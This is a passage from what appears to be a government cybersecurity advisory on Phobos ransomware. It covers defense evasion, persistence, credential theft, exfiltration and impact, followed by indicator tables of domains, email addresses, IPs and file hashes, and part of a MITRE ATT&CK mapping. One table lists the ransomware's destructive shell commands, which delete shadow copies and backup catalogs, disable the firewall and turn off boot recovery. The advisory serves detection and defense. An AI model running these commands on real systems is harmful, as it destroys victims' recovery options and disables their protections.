756. <p>Finally, once Smokeloader reaches its third stage, it unpacks a program-erase cycle from stored memory, which is then sent to be extracted from a SHA 256 hash as a payload.[<a href="https://blog.talosintelligence.com/deep-dive-into-phobos-ransomware/" title="A deep dive into Phobos ransomware, recently deployed by 8Base group">7</a>] Following successful payload decryption, the threat actors can begin downloading additional malware.</p>
757. <h5><em><strong>Additional Phobos Defense Evasion Capabilities</strong></em></h5>
758. <p>Phobos ransomware actors have been observed bypassing organizational network defense protocols by modifying system firewall configurations using commands like <code>netsh firewall set opmode mode=disable</code> [<a href="https://attack.mitre.org/versions/v14/techniques/T1562/004/" title="Impair Defenses: Disable or Modify System Firewall">T1562.004</a>]. Additionally, Phobos actors can evade detection by using the following tools: Universal Virus Sniffer, Process Hacker, and PowerTool [<a href="https://attack.mitre.org/versions/v14/techniques/T1562/" title="Impair Defenses">T1562</a>].</p>
759. <h4><strong>Persistence and Privilege Escalation</strong></h4>
760. <p>According to open source reporting, Phobos ransomware uses commands such as <code>Exec.exe</code> or the <code>bcdedit[.]exe</code> control mechanism. Phobos has also been observed using Windows Startup folders and Run Registry Keys such as <code>C:/Users\Admin\AppData\Local\directory</code> [<a href="https://attack.mitre.org/versions/v14/techniques/T1490/" title="Inhibit System Recovery">T1490</a>][<a href="https://attack.mitre.org/versions/v14/techniques/T1547/001/" title="Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder">T1547.001</a>] to maintain persistence within compromised environments.[<a href="https://www.comparitech.com/net-admin/phobos-ransomware/" title="What is Phobos Ransomware & How to Protect Against It?">5</a>]</p>
761. <p>Additionally, Phobos actors have been observed using built-in Windows API functions [<a href="https://attack.mitre.org/versions/v14/techniques/T1106/" title="Native API">T1106</a>] to steal tokens [<a href="https://attack.mitre.org/versions/v14/techniques/T1134/001/" title="Access Token Manipulation: Token Impersonation/Theft">T1134.001</a>], bypass access controls, and create new processes to escalate privileges by leveraging the <code>SeDebugPrivilege</code> process [<a href="https://attack.mitre.org/versions/v14/techniques/T1134/002/" title="Access Token Manipulation: Create Process with Token">T1134.002</a>]. Phobos actors attempt to authenticate using cached password hashes on victim machines until they reach domain administrator access [<a href="https://attack.mitre.org/versions/v14/techniques/T1003/005/" title="OS Credential Dumping: Cached Domain Credentials">T1003.005</a>].</p>
762. <h4><strong>Discovery and Credential Access</strong></h4>
763. <p>Phobos actors additionally use open source tools [<a href="https://attack.mitre.org/versions/v14/techniques/T1588/002/" title="Obtain Capabilities: Tool">T1588.002</a>] such as <a href="https://attack.mitre.org/versions/v14/software/S0521/" title="BloodHound">Bloodhound</a> and Sharphound to enumerate the active directory [<a href="https://attack.mitre.org/versions/v14/techniques/T1087/002/" title="Account Discovery: Domain Account">T1087.002</a>]. <a href="https://attack.mitre.org/versions/v14/software/S0002/" title="Mimikatz">Mimikatz</a> and NirSoft, as well as Remote Desktop Passview to export browser client credentials [<a href="https://attack.mitre.org/versions/v14/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a>][<a href="https://attack.mitre.org/versions/v14/techniques/T1555/003/" title="Credentials from Password Stores: Credentials from Web Browsers">T1555.003</a>], have also been used. Furthermore, Phobos ransomware is able to enumerate connected storage devices [<a href="https://attack.mitre.org/versions/v14/techniques/T1082/" title="System Information Discovery">T1082</a>], running processes [<a href="https://attack.mitre.org/versions/v14/techniques/T1057/" title="Process Discovery">T1057</a>], and encrypt user files [<a href="https://attack.mitre.org/versions/v14/techniques/T1083/" title="File and Directory Discovery">T1083</a>].</p>
764. <h4><strong>Exfiltration</strong></h4>
765. <p>Phobos actors have been observed using <code>WinSCP</code> and <code>Mega.io</code> for file exfiltration.[<a href="https://www.truesec.com/hub/blog/a-case-of-the-faust-ransomware" title="A case of the FAUST Ransomware">11</a>] They use <code>WinSCP</code> to connect directly from a victim network to an FTP server [<a href="https://attack.mitre.org/versions/v14/techniques/T1071/002/" title="Application Layer Protocol: File Transfer Protocols">T1071.002</a>] they control [<a href="https://attack.mitre.org/versions/v14/tactics/TA0010/" title="Exfiltration">TA0010</a>]. Phobos actors install <code>Mega.io</code> [<a href="https://attack.mitre.org/versions/v14/techniques/T1048/" title="Exfiltration Over Alternative Protocol">T1048</a>] and use it to export victim files directly to a cloud storage provider [<a href="https://attack.mitre.org/versions/v14/techniques/T1567/002/" title="Exfiltration Over Web Service: Exfiltration to Cloud Storage">T1567.002</a>]. Data is typically archived as either a <code>.rar</code> or <code>.zip</code> file [<a href="https://attack.mitre.org/versions/v14/techniques/T1560/" title="Archive Collected Data">T1560</a>] to be later exfiltrated. They target legal documentation, financial records, technical documents (including network architecture), and databases for commonly used password management software [<a href="https://attack.mitre.org/versions/v14/techniques/T1555/005/" title="Credentials from Password Stores: Password Managers">T1555.005</a>].</p>
766. <h4><strong>Impact</strong></h4>
767. <p>After the exfiltration phase, Phobos actors then hunt for backups. They use <code>vssadmin.exe</code> and Windows Management Instrumentation command-line utility (WMIC) to discover and delete volume shadow copies in Windows environments. This prevents victims from recovering files after encryption has taken place [<a href="https://attack.mitre.org/versions/v14/techniques/T1047/" title="Windows Management Instrumentation">T1047</a>][<a href="https://attack.mitre.org/versions/v14/techniques/T1490/" title="Inhibit System Recovery">T1490</a>].</p>
768. <p><code>Phobos.exe</code> contains functionality to encrypt all connected logical drives on the target host [<a href="https://attack.mitre.org/versions/v14/techniques/T1486/" title="Data Encrypted for Impact">T1486</a>]. Each Phobos ransomware executable has unique build identifiers (IDs), affiliate IDs, as well as a unique ransom note which is embedded in the executable. After the ransom note has populated on infected workstations, Phobos ransomware continues to search for and encrypt additional files.</p>
769. <p>Most extortion [<a href="https://attack.mitre.org/versions/v14/techniques/T1657/" title="Financial Theft">T1657</a>] occurs via email; however, some affiliate groups have used voice calls to contact victims. In some cases, Phobos actors have used onion sites to list victims and host stolen victim data. Phobos actors use various instant messaging applications such as ICQ, Jabber, and QQ to communicate [<a href="https://attack.mitre.org/versions/v14/techniques/T1585/" title="Establish Accounts">T1585</a>]. See Figure 2 for a list of email providers used by the following Phobos affiliates: Devos, Eight, Elbie, Eking, and Faust.[<a href="https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/" title="Understanding the Phobos affiliate structure and activity">6</a>]</p>
770.  
771.  
772.  
773. <figure class="c-figure c-figure--image u-align-center" role="group">
774.  
775.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%201%20-%20Phobos%20Affiliate%20Providers%20List.png?itok=nQtK0JWW" width="632" height="377" alt="Figure 1: Phobos Affiliate Providers List">
776.  
777.  
778.  
779. </div>
780.      <figcaption class="c-figure__caption"><em>Figure 1: </em><a href="https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/"><em>Phobos Affiliate Providers List</em></a></figcaption>
781.  </figure>
782. <h3><strong>INDICATORS OF COMPROMISE (IOCs)</strong></h3>
783. <p>See Table 1 through 6 for IOCs obtained from CISA and the FBI investigations from September through November 2023.</p>
784. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
785. <caption><em>Table 1: Associated Phobos Domains</em></caption>
786. <thead>
787. <tr>
788. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Associated Phobos Domains</strong></th>
789. </tr>
790. </thead>
791. <tbody>
792. <tr>
793. <td>adstat477d[.]xyz</td>
794. </tr>
795. <tr>
796. <td>demstat577d[.]xyz [<a href="https://www.virustotal.com/gui/domain/demstat577d.xyz" title="Phobos Domain #1">12</a>]</td>
797. </tr>
798. <tr>
799. <td>serverxlogs21[.]xyz</td>
800. </tr>
801. </tbody>
802. </table>
803. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
804. <caption><em>Table 2: Observed Phobos Shell Commands</em></caption>
805. <thead>
806. <tr>
807. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Shell Commands</strong></th>
808. </tr>
809. </thead>
810. <tbody>
811. <tr>
812. <td>vssadmin delete shadows /all /quiet [<a href="https://attack.mitre.org/versions/v14/techniques/T1490/" title="Inhibit System Recovery">T1490</a>]</td>
813. </tr>
814. <tr>
815. <td>netsh advfirewall set currentprofile state off</td>
816. </tr>
817. <tr>
818. <td>wmic shadowcopy delete</td>
819. </tr>
820. <tr>
821. <td>netsh firewall set opmode mode=disable [<a href="https://attack.mitre.org/versions/v14/techniques/T1562/004/" title="Impair Defenses: Disable or Modify System Firewall">T1562.004</a>]</td>
822. </tr>
823. <tr>
824. <td>bcdedit /set {default} bootstatuspolicy ignoreallfailures [<a href="https://attack.mitre.org/versions/v14/techniques/T1547/001/" title="Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder">T1547.001</a>]</td>
825. </tr>
826. <tr>
827. <td>bcdedit /set {default} recoveryenabled no [<a href="https://attack.mitre.org/versions/v14/techniques/T1490/" title="Inhibit System Recovery">T1490</a>]</td>
828. </tr>
829. <tr>
830. <td>wbadmin delete catalog -quiet</td>
831. </tr>
832. <tr>
833. <td>mshta C:\%USERPROFILE%\Desktop\info.hta [<a href="https://attack.mitre.org/versions/v14/techniques/T1218/005/" title="System Binary Proxy Execution: Mshta">T1218.005</a>]</td>
834. </tr>
835. <tr>
836. <td>mshta C:\%PUBLIC%\Desktop\info.hta</td>
837. </tr>
838. <tr>
839. <td>mshta C:\info.hta</td>
840. </tr>
841. </tbody>
842. </table>
843. <p>The commands above are observed during the execution of a Phobos encryption executable. A Phobos encryption executable spawns a <code>cmd.exe</code> process, which then executes the commands listed in Table 1 with their respective Windows system executables. When the commands above are executed on a Windows system, volume shadow copies are deleted and Windows Firewall is disabled. Additionally, the system’s boot status policy is set to boot even when there are errors during the boot process, and automatic recovery options, like Windows Recovery Environment (WinRE), are disabled for the given boot entry. The system’s backup catalog is also deleted. Finally, the Phobos ransom note is displayed to the end user using <code>mshta.exe</code>.</p>
844. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
845. <caption><em>Table 3: Observed Phobos Registry Keys</em></caption>
846. <thead>
847. <tr>
848. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Registry Keys</strong></th>
849. </tr>
850. </thead>
851. <tbody>
852. <tr>
853. <td>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\<Phobos exe name></td>
854. </tr>
855. <tr>
856. <td>C:/Users\Admin\AppData\Local\directory</td>
857. </tr>
858. </tbody>
859. </table>
860. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
861. <caption><em>Table 4: Observed Phobos Actor Email Addresses</em></caption>
862. <thead>
863. <tr>
864. <th role="columnheader" data-tablesaw-priority="persist"><strong>Email Addresses</strong></th>
865. <th role="columnheader"> </th>
866. </tr>
867. </thead>
868. <tbody>
869. <tr>
870. <td>AlbetPattisson1981@protonmail[.]com</td>
871. <td>henryk@onionmail[.]org</td>
872. </tr>
873. <tr>
874. <td>atomicday@tuta[.]io</td>
875. <td>info@fobos[.]one</td>
876. </tr>
877. <tr>
878. <td>axdus@tuta[.]io</td>
879. <td>it.issues.solving@outlook[.]com</td>
880. </tr>
881. <tr>
882. <td>barenuckles@tutanota[.]com</td>
883. <td>JohnWilliams1887@gmx[.]com</td>
884. </tr>
885. <tr>
886. <td>Bernard.bunyan@aol[.]com</td>
887. <td>jonson_eight@gmx[.]us</td>
888. </tr>
889. <tr>
890. <td>bill.g@gmx[.]com</td>
891. <td>joshuabernandead@gmx[.]com</td>
892. </tr>
893. <tr>
894. <td>bill.g@msgsafe[.]io</td>
895. <td>LettoIntago@onionmail[.]com</td>
896. </tr>
897. <tr>
898. <td>bill.g@onionmail[.]org</td>
899. <td>Luiza.li@tutanota[.]com</td>
900. </tr>
901. <tr>
902. <td>bill.gTeam@gmx[.]com</td>
903. <td>MatheusCosta0194@gmx[.]com</td>
904. </tr>
905. <tr>
906. <td>blair_lockyer@aol[.]com</td>
907. <td>mccreight.ellery@tutanota[.]com</td>
908. </tr>
909. <tr>
910. <td>CarlJohnson1948@gmx[.]com</td>
911. <td>megaport@tuta[.]io</td>
912. </tr>
913. <tr>
914. <td>cashonlycash@gmx[.]com</td>
915. <td>miadowson@tuta[.]io</td>
916. </tr>
917. <tr>
918. <td>chocolate_muffin@tutanota[.]com</td>
919. <td>MichaelWayne1973@tutanota[.]com</td>
920. </tr>
921. <tr>
922. <td>claredrinkall@aol[.]com</td>
923. <td>normanbaker1929@gmx[.]com</td>
924. </tr>
925. <tr>
926. <td>clausmeyer070@cock[.]li</td>
927. <td>nud_satanakia@keemail[.]me</td>
928. </tr>
929. <tr>
930. <td>colexpro@keemail[.]me</td>
931. <td>please@countermail[.]com</td>
932. </tr>
933. <tr>
934. <td>cox.barthel@aol[.]com</td>
935. <td>precorpman@onionmail[.]org</td>
936. </tr>
937. <tr>
938. <td>crashonlycash@gmx[.]com</td>
939. <td>recovery2021@inboxhub[.]net</td>
940. </tr>
941. <tr>
942. <td>everymoment@tuta[.]io</td>
943. <td>recovery2021@onionmail[.]org</td>
944. </tr>
945. <tr>
946. <td>expertbox@tuta[.]io</td>
947. <td>SamuelWhite1821@tutanota[.]com</td>
948. </tr>
949. <tr>
950. <td>fastway@tuta[.]io</td>
951. <td>SaraConor@gmx[.]com</td>
952. </tr>
953. <tr>
954. <td>fquatela@techie[.]com</td>
955. <td>secdatltd@gmx[.]com</td>
956. </tr>
957. <tr>
958. <td>fredmoneco@tutanota[.]com</td>
959. <td>skymix@tuta[.]io</td>
960. </tr>
961. <tr>
962. <td>getdata@gmx[.]com</td>
963. <td>sory@countermail[.]com</td>
964. </tr>
965. <tr>
966. <td>greenbookBTC@gmx[.]com</td>
967. <td>spacegroup@tuta[.]io</td>
968. </tr>
969. <tr>
970. <td>greenbookBTC@protonmail[.]com</td>
971. <td>stafordpalin@protonmail[.]com</td>
972. </tr>
973. <tr>
974. <td>helperfiles@gmx[.]com</td>
975. <td>starcomp@keemail[.]me</td>
976. </tr>
977. <tr>
978. <td>helpermail@onionmail[.]org</td>
979. <td>xdone@tutamail[.]com</td>
980. </tr>
981. <tr>
982. <td>helpfiles@onionmail[.]org</td>
983. <td>xgen@tuta[.]io</td>
984. </tr>
985. <tr>
986. <td>helpfiles102030@inboxhub[.]net</td>
987. <td>xspacegroup@protonmail[.]com</td>
988. </tr>
989. <tr>
990. <td>helpforyou@gmx[.]com</td>
991. <td>zgen@tuta[.]io</td>
992. </tr>
993. <tr>
994. <td>helpforyou@onionmail[.]org</td>
995. <td>zodiacx@tuta[.]io</td>
996. </tr>
997. </tbody>
998. </table>
999. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1000. <caption><em>Table 5: Observed Phobos Actor Telegram Username</em></caption>
1001. <thead>
1002. <tr>
1003. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Telegram Username</strong></th>
1004. </tr>
1005. </thead>
1006. <tbody>
1007. <tr>
1008. <td>@phobos_support</td>
1009. </tr>
1010. </tbody>
1011. </table>
1012. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1013. <caption><em>Table 6: Observed Phobos Actor Wickr Address</em></caption>
1014. <thead>
1015. <tr>
1016. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Wickr Address</strong></th>
1017. </tr>
1018. </thead>
1019. <tbody>
1020. <tr>
1021. <td>
1022. <ul>
1023. <li>Vickre me</li>
1024. </ul>
1025. </td>
1026. </tr>
1027. </tbody>
1028. </table>
1029. <p><strong>Disclaimer:</strong> Organizations are encouraged to investigate the use of the IOCs in Table 7 for related signs of compromise prior to performing remediation actions.</p>
1030. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1031. <caption><em>Table 7: Phobos IOCs from September through December 2023</em></caption>
1032. <thead>
1033. <tr>
1034. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Associated IP Address</strong></th>
1035. <th scope="col" role="columnheader"><strong>File Type</strong></th>
1036. <th scope="col" role="columnheader"><strong>File Name</strong></th>
1037. <th scope="col" role="columnheader"><strong>SHA 256 Hash</strong></th>
1038. </tr>
1039. </thead>
1040. <tbody>
1041. <tr>
1042. <td>194.165.16[.]4 (October 2023)</td>
1043. <td>Win32.exe</td>
1044. <td>Ahpdate.exe [<a href="https://www.virustotal.com/gui/file/0000599cbc6e5b0633c5a6261c79e4d3d81005c77845c6b0679d854884a8e02f" title="Phobos executable: Ahpdate.exe">13</a>]</td>
1045. <td>0000599cbc6e5b0633c5a6261c79e4d3d81005c77845c6b0679d854884a8e02f</td>
1046. </tr>
1047. <tr>
1048. <td>
1049. <p>45.9.74[.]14 (December 2023)</p>
1050. <p>147.78.47[.]224 (December 2023)</p>
1051. </td>
1052. <td>Executable and Linkable Format (ELF) [<a href="https://www.virustotal.com/gui/file/7451be9b65b956ee667081e1141531514b1ec348e7081b5a9cd1308a98eec8f0" title="Phobos IP Address: ELF File">14</a>]</td>
1053. <td>
1054. <p>1570442295</p>
1055. <p>(Trojan Linux Mirai)</p>
1056. </td>
1057. <td>7451be9b65b956ee667081e1141531514b1ec348e7081b5a9cd1308a98eec8f0</td>
1058. </tr>
1059. <tr>
1060. <td>185.202.0[.]111 (September 2023)</td>
1061. <td>Win32.exe [<a href="https://www.virustotal.com/gui/ip-address/185.202.0.111/relations%20Win32.exe%20file%20cobaltstrike_shellcode.exe%20last%20scanned%20September%202023" title="Phobos IP address: 185.202.0[.]111">15</a>]</td>
1062. <td>cobaltstrike_shellcode[.]exe (C2 activity)</td>
1063. <td> </td>
1064. </tr>
1065. <tr>
1066. <td>185.202.0[.]111 (December 2023)</td>
1067. <td>.txt [<a href="https://www.virustotal.com/gui/file/f1425cff3d28afe5245459afa6d7985081bc6a62f86dce64c63daeb2136d7d2c" title="Phobos Gui File">16</a>]</td>
1068. <td>f1425cff3d28afe5245459afa6d7985081bc6a62f86dce64c63daeb2136d7d2c.bin (Trojan)</td>
1069. <td> </td>
1070. </tr>
1071. </tbody>
1072. </table>
1073. <p><strong>Disclaimer:</strong> Organizations are encouraged to investigate the use of the file hashes in Tables 8 and 9 for related signs of compromise prior to performing remediation actions.</p>
1074. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1075. <caption><em>Table 8: Phobos Actor File Hashes Observed in October 2023</em></caption>
1076. <thead>
1077. <tr>
1078. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Phobos Ransomware SHA 256 Malicious Trojan Executable File Hashes</strong></th>
1079. </tr>
1080. </thead>
1081. <tbody>
1082. <tr>
1083. <td>518544e56e8ccee401ffa1b0a01a10ce23e49ec21ec441c6c7c3951b01c1b19c</td>
1084. </tr>
1085. <tr>
1086. <td>9215550ce3b164972413a329ab697012e909d543e8ac05d9901095016dd3fc6c</td>
1087. </tr>
1088. <tr>
1089. <td>482754d66d01aa3579f007c2b3c3d0591865eb60ba60b9c28c66fe6f4ac53c52</td>
1090. </tr>
1091. <tr>
1092. <td>c0539fd02ca0184925a932a9e926c681dc9c81b5de4624250f2dd885ca5c4763</td>
1093. </tr>
1094. </tbody>
1095. </table>
1096. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1097. <caption><em>Table 9: Phobos Actor File Hashes from Open Source from November 2023 [</em><a href="https://github.com/Cisco-Talos/IOCs/blob/main/2023/11/deep-dive-into-phobos-ransomware.txt" title="Cisco-Talos / IOCs"><em>17</em></a><em>]</em></caption>
1098. <thead>
1099. <tr>
1100. <th role="columnheader" data-tablesaw-priority="persist"><strong>Phobos Ransomware SHA 256 File Hashes</strong></th>
1101. </tr>
1102. </thead>
1103. <tbody>
1104. <tr>
1105. <td>58626a9bfb48cd30acd0d95debcaefd188ae794e1e0072c5bde8adae9bccafa6</td>
1106. </tr>
1107. <tr>
1108. <td>f3be35f8b8301e39dd3dffc9325553516a085c12dc15494a5e2fce73c77069ed</td>
1109. </tr>
1110. <tr>
1111. <td>518544e56e8ccee401ffa1b0a01a10ce23e49ec21ec441c6c7c3951b01c1b19c</td>
1112. </tr>
1113. <tr>
1114. <td>32a674b59c3f9a45efde48368b4de7e0e76c19e06b2f18afb6638d1a080b2eb3</td>
1115. </tr>
1116. <tr>
1117. <td>2704e269fb5cf9a02070a0ea07d82dc9d87f2cb95e60cb71d6c6d38b01869f66</td>
1118. </tr>
1119. <tr>
1120. <td>fc4b14250db7f66107820ecc56026e6be3e8e0eb2d428719156cf1c53ae139c6</td>
1121. </tr>
1122. <tr>
1123. <td>a91491f45b851a07f91ba5a200967921bf796d38677786de51a4a8fe5ddeafd2</td>
1124. </tr>
1125. </tbody>
1126. </table>
1127. <h3><strong>MITRE ATT&CK TECHNIQUES</strong></h3>
1128. <p>See Table 10 through 22 for all threat actor tactics and techniques referenced in this advisory.</p>
1129. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1130. <caption><em>Table 10: Phobos Threat Actors ATT&CK Techniques for Enterprise – Reconnaissance</em></caption>
1131. <thead>
1132. <tr>
1133. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
1134. <th scope="col" role="columnheader"><strong>ID</strong></th>
1135. <th scope="col" role="columnheader"><strong>Use</strong></th>
1136. </tr>
1137. </thead>
1138. <tbody>
1139. <tr>
1140. <td>Search Open Websites/Domains</td>
1141. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1593/" title="Search Open Websites/Domains">T1593</a></td>
1142. <td>Phobos actors perform open source research to find information about victims that can be used during targeting to create a victim profile.</td>
1143. </tr>
1144. <tr>
1145. <td>Scanning IP Blocks</td>
1146. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1595/001/" title="Scanning IP Blocks">T1595.001</a></td>
1147. <td>Phobos actors used IP scanning tools to include Angry IP Scanner to search for vulnerable RDP ports.</td>
1148. </tr>
1149. <tr>
1150. <td>Phishing for Information</td>
1151. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1598/" title="Phishing for Information">T1598</a></td>
1152. <td>Phobos actors use phishing campaigns to social engineer information from users and gain access to vulnerable RDP ports.</td>
1153. </tr>
1154. </tbody>
1155. </table>
1156. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1157. <caption><em>Table 11: Phobos Threat Actors ATT&CK Techniques for Enterprise – Resource Development</em></caption>
1158. <thead>
1159. <tr>
1160. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
1161. <th scope="col" role="columnheader"><strong>ID</strong></th>
1162. <th scope="col" role="columnheader"><strong>Use</strong></th>
1163. </tr>
1164. </thead>
1165. <tbody>
1166. <tr>
1167. <td>Establish Accounts</td>
1168. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1585/" title="Establish Accounts">T1585</a></td>
1169. <td>Phobos actors establish accounts to communicate.</td>
1170. </tr>
1171. <tr>
1172. <td>Obtain Capabilities: Tool</td>
1173. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1588/002/" title="Obtain Capabilities: Tool">T1588.002</a></td>
1174. <td>Phobos actors used open source tools in their attack.</td>
1175. </tr>
1176. </tbody>
1177. </table>
1178. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1179. <caption><em>Table 12: Phobos Threat Actors ATT&CK Techniques for Enterprise – Initial Access</em></caption>
1180. <thead>
1181. <tr>
1182. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
1183. <th scope="col" role="columnheader"><strong>ID</strong></th>
1184. <th scope="col" role="columnheader"><strong>Use</strong></th>
1185. </tr>
1186. </thead>
1187. <tbody>
1188. <tr>
1189. <td>Valid Accounts</td>
1190. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1078/" title="Valid Accounts">T1078</a></td>
1191. <td>Following successful RDP authentication, Phobos actors search for IP addresses and pair them with their associated computer to create a victim profile.</td>
1192. </tr>
1193. <tr>
1194. <td>External Remote Services</td>
1195. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1133/" title="External Remote Services">T1133</a></td>
1196. <td>Phobos actors may leverage external-facing remote services to initially access and/or persist within a network.</td>
1197. </tr>
1198. <tr>
1199. <td>Phishing: Spearphishing Attachment</td>
1200. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1566/001/" title="Phishing: Spearphishing Attachment">T1566.001</a></td>
1201. <td>Phobos actors used a spoofed email attachment to execute attack.</td>
1202. </tr>
1203. </tbody>
1204. </table>
1205. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1206. <caption><em>Table 13: Phobos Threat Actors ATT&CK Techniques for Enterprise – Execution</em></caption>
1207. <thead>
1208. <tr>
1209. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
1210. <th scope="col" role="columnheader"><strong>ID</strong></th>
1211. <th scope="col" role="columnheader"><strong>Use</strong></th>
1212. </tr>
1213. </thead>
1214. <tbody>
1215. <tr>
1216. <td>Windows Management Instrumentation</td>
1217. <td><a href="http://attack.mitre.org/versions/v14/techniques/T1047/" title="Windows Management Instrumentation">T1047</a></td>
1218. <td>Phobos actors used Windows Management Instrumentation command-line utility (WMIC) to prevent victims from recovering files.</td>
1219. </tr>
1220. <tr>
1221. <td>Windows Command Shell</td>
1222. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1059/003/" title="Windows Command Shell">T1059.003</a></td>
1223. <td>Phobos actors can use the previous commands to perform commands with windows shell functions.</td>
1224. </tr>
1225. <tr>
1226. <td>Native API</td>
1227. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1106/" title="Native API">T1106</a></td>
1228. <td>Phobos actors used open source tools to enumerate the active directory.</td>
1229. </tr>
1230. <tr>
1231. <td>Malicious File</td>
1232. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1204/002/" title="Malicious File">T1204.002</a></td>
1233. <td>Phobos actors attached a malicious email attachment to deliver ransomware.</td>
1234. </tr>
1235. </tbody>
1236. </table>
1237. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1238. <caption><em>Table 14: Phobos Threat Actors ATT&CK Techniques for Enterprise – Persistence</em></caption>
1239. <thead>
1240. <tr>
1241. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
1242. <th scope="col" role="columnheader"><strong>ID</strong></th>
1243. <th scope="col" role="columnheader"><strong>Use</strong></th>
1244. </tr>
1245. </thead>
1246. <tbody>
1247. <tr>
1248. <td>Registry Run Keys / Startup Folder</td>
1249. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1547/001/" title="Registry Run Keys / Startup Folder">T1547.001</a></td>
1250. <td>Phobos ransomware operates using the <code>Exec.exe</code> control mechanism and has been observed using Windows Startup folders and Run Registry Keys.</td>
1251. </tr>
1252. </tbody>
1253. </table>
1254. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1255. <caption><em>Table 15: Phobos Threat Actors ATT&CK Techniques for Enterprise – Privilege Escalation</em></caption>
1256. <thead>
1257. <tr>
1258. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
1259. <th scope="col" role="columnheader"><strong>ID</strong></th>
1260. <th scope="col" role="columnheader"><strong>Use</strong></th>
1261. </tr>
1262. </thead>
1263. <tbody>
1264. <tr>
1265. <td>Privilege Escalation</td>
1266. <td><a href="https://attack.mitre.org/versions/v14/tactics/TA0004/" title="Privilege Escalation">TA0004</a></td>
1267. <td>Phobos actors use run commands like <code>1saas.exe</code>, or <code>cmd.exe</code> to deploy additional Phobos payloads with escalated privileges.</td>
1268. </tr>
1269. <tr>
1270. <td>Portable Executable Injection</td>
1271. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1055/002/" title="Portable Executable Injection">T1055.002</a></td>
1272. <td>Phobos actors use Smokeloader to inject code into running processes to identify an entry point through enabling a <code>VirtualAlloc</code> or <code>VirtualProtect</code> process.</td>
1273. </tr>
1274. <tr>
1275. <td>Asynchronous Procedure Call</td>
1276. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1055/004/" title="Asynchronous Procedure Call">T1055.004</a></td>
1277. <td>During phase two of execution, Phobos ransomware sends a call back from an identified entry point.</td>
1278. </tr>
1279. <tr>
1280. <td>Access Token Manipulation: Token Impersonation/Theft</td>
1281. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1134/001/" title="Access Token Manipulation: Token Impersonation/Theft">T1134.001</a></td>
1282. <td>Phobos actors can use Windows API functions to steal tokens.</td>
1283. </tr>
1284. <tr>
1285. <td>Create Process with Token</td>
1286. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1134/002/" title="Create Process with Token">T1134.002</a></td>
1287. <td>Phobos actors used Windows API functions to steal tokens, bypass access controls and create new processes.</td>
1288. </tr>
1289. </tbody>
1290. </table>
1291. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
1292. <caption><em>Table 16: Phobos Threat Actors ATT&CK Techniques for Enterprise – Defense Evasion</em></caption>
1293. <thead>
1294. <tr>
1295. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
1296. <th scope="col" role="columnheader"><strong>ID</strong></th>
1297. <th scope="col" role="columnheader"><strong>Use</strong></th>
1298. </tr>
1299. </thead>
1300. <tbody>
1301. <tr>
1302. <td>Software Packing</td>
1303. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1027/002/" title="Software Packing">T1027.002</a></td>
1304. <td>Phobos actors deployed a portable executable (PE) to conceal code.</td>
1305. </tr>
1306. <tr>
1307. <td>Embedded Payloads</td>
